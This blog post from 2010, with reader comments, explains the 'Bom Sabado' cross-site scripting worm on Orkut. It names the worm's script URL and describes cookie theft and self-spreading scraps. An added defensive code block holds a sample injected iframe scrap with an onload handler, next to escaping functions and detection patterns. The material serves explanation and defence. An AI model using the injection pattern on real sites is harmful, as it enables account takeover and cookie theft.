Orkut attacked by 'Bom Sabado' worm
Saturday, September 25, 2010
Surbhi Verma
‘Bom Sabado!’‘Bom Sabado!’‘Bom Sabado!’
Hi friends, did you find this scrap in your scrapbook from many of your friends? If yes, then don't visit the profile of the person the message came from, because your friend's profile is now infected by a virus named ‘Bom Sabado!’. If you visit any affected profile, your profile and your system will also be affected by this virus!
What is ‘Bom Sabado!’?
'Bom Sabado' is a new XSS (cross-site scripting) worm, created specifically to target Orkut.
'Bom Sabado' is Portuguese for 'Good Saturday'.
There is only one country in which Orkut is still the no. 1 social website, so it is assumed that someone made this virus to attack the popularity of Orkut.
How does it work?
When anyone opens a page that is infected by this worm, a JavaScript file (from http://tptools.org/worm.js or http://tptools.org/worm.js#%3Cwbr%3E#:1) runs automatically. It automatically joins some communities and sends a scrap to your friends with the text “Bom Sabado!” together with iframe code that loads the same JavaScript again for your friends, who in turn join the communities and send the scrap on to their friends. The worm also steals cookies from your browser.
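The hole described above is that scrap text is rendered as live HTML. This added example (not code from this post or from Orkut) shows the vulnerable rendering beside an escaped one, a scan for stored scraps that carry active markup, and a session cookie that page script cannot read. All function names and the sample scrap are constructed for illustration.

```javascript
// Constructed sample with the shape the post describes: visible text plus a
// hidden iframe whose onload handler would load a remote script.
// loadRemoteScript() is a placeholder, not a real function.
const SAMPLE_SCRAP =
  'Bom Sabado!<iframe style="display:none" onload="loadRemoteScript()"></iframe>';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag, an attribute or an entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: user text is concatenated into the page, so the iframe and its
// onload handler become part of the DOM of every visitor to the profile.
function renderScrapUnsafe(text) {
  return '<div class="scrap">' + text + '</div>';
}

// Hardened: the same text is shown literally and nothing in it can execute.
function renderScrapSafe(text) {
  return '<div class="scrap">' + escapeHtml(text) + '</div>';
}

// Clean-up aid: explain why a stored scrap looks like worm residue.
function flagSuspiciousScrap(text) {
  const reasons = [];
  if (/<\s*(script|iframe|object|embed)\b/i.test(text)) reasons.push('active-element');
  if (/<[^>]*\son\w+\s*=/i.test(text)) reasons.push('event-handler');
  return reasons;
}

// Return the ids of stored scraps that need to be purged or re-escaped.
function findInfectedScraps(scraps) {
  return scraps.filter((s) => flagSuspiciousScrap(s.text).length > 0).map((s) => s.id);
}

// HttpOnly keeps the session cookie out of document.cookie. It limits cookie
// theft only: injected script still runs with the visitor's session, so
// output escaping remains the actual fix.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}
```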
Orkut has temporarily fixed the issue.
On the Orkut Support Forums, a 'Top Contributor' has declared that Orkut has temporarily fixed the issue.
What can be meant by temporarily here? What I guess is that they have only removed the JavaScript from the site http://tptools.org, but it will take time to fix this 'Hole of Orkut' to save Orkut in coming times. So just be aware!!!
I will suggest you all disable JavaScript in your browser, to avoid this type of problem :)
Suggestion for users affected by Bom Sabado
As this virus steals cookies from the browser, it is suggested that you clear your browser's cookies immediately and change all your passwords.
Code of the Bom Sabado worm, taken from http://tptools.org/
All readers are most welcome to share their experience with these kinds of virus attacks!
6 comments for this post
deepa kashyap
September 25, 2010 at 4:45 PM
Hey, thanks a lot. As I checked my scrapbook I saw a message like that only, ‘Bom Sabado’. I was about to scrap him to ask what it means; in the meanwhile I checked your post and, oh god, that's a virus attack!!
What if I hide that scrap?
Sn34k3r
September 25, 2010 at 7:53 PM
"Bom Sabado" Bug Creating Problems in Orkut
what is bom sabado, bom sabado meaning, meaning of bom sabado, bom sabado means, bom sabado!
Today in the morning I saw every account was posting a scrap, something like bomb amungu or Bom Sabado.
And those who are reading this scrap, even in their own profile, have their cookies stolen too, and so they are also automatically posting the same scrap to their friend list, something like bomb :(
The script is running on, and also in the status of the profile their flag is appearing. I mean statuses are automatically updated in some profiles. It's the flag of Brazil. The Google team is already working on it.
By the way, Bom Sabado means Good Saturday.
Currently what you should do is:
Solutions:
Follow these steps:
1. Immediately change your password and security question (including secondary email and mobile number if they also got changed). This will solve the problem.
2. Find out whether some communities have been joined automatically. If yes, do remove them.
3. If your account has been completely hacked, see here:
http://www.google.com/support/forum/p/orkut/thread?tid=39fa418ed1162078&hl=en
4. Always remember these points:
4.1 Do not ever log in to any site other than www.orkut.com
4.2 Do not ever run any JavaScript while logged in to your Orkut account
4.3 Never use any flooder in your account
4.4 Do not ever share your password with anyone else, and keep changing your password regularly.
4.5 Do not ever click a suspicious link while logged in to your Orkut account. If you are curious you can copy the link and check it in another browser after cleaning that browser's cookies and cache.
4.6 Do not ever install any suspicious script in Greasemonkey and ALWAYS DISABLE GM before logging in to Orkut.
4.7 Do your mobile verification also, so that you can get back your account if the hacker doesn't change the mobile number there.
http://www.orkut.co.in/Main#MobileSetupSettings
4.8 Install a good, updated antivirus and anti-keylogger and keep your system free from keyloggers and backdoor trojans.
4.9 Use a virtual keyboard to enter your password for more security. KIS 2010 provides one and there are many other virtual keyboards available.
Take a look here and follow the points given to protect your account:
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=57442
and
http://www.google.com/support/orkut/bin/answer.py?hl=en&answer=48579
Hope this helps you... ;)
Happy Orkutting..
Surbhi Verma
September 26, 2010 at 12:09 AM
@Deepa... No need to hide the scrap, the problem is fixed now :)
But be aware in future: never check the affected profile if this type of message comes again!
sudhansh jain
September 26, 2010 at 7:44 AM
Yeah, I have also got some scraps like that... but thank god my profile is not affected by that!!
LoGaN
September 26, 2010 at 5:03 PM
If the browser is run sandboxed, with that "Sandboxie" tool you gave, will it protect the system from the virus, or the Orkut profile, to any extent?
Surbhi Verma
September 28, 2010 at 8:20 PM
@Logan... very good question...
Well, in these types of attacks in which the hacker steals the browser's cookies, Sandboxie could not protect the users either, because if you run your browser in a sandbox and still keep saved passwords, they will be accessible from the sandbox, which means they can be hacked by cookie stealers.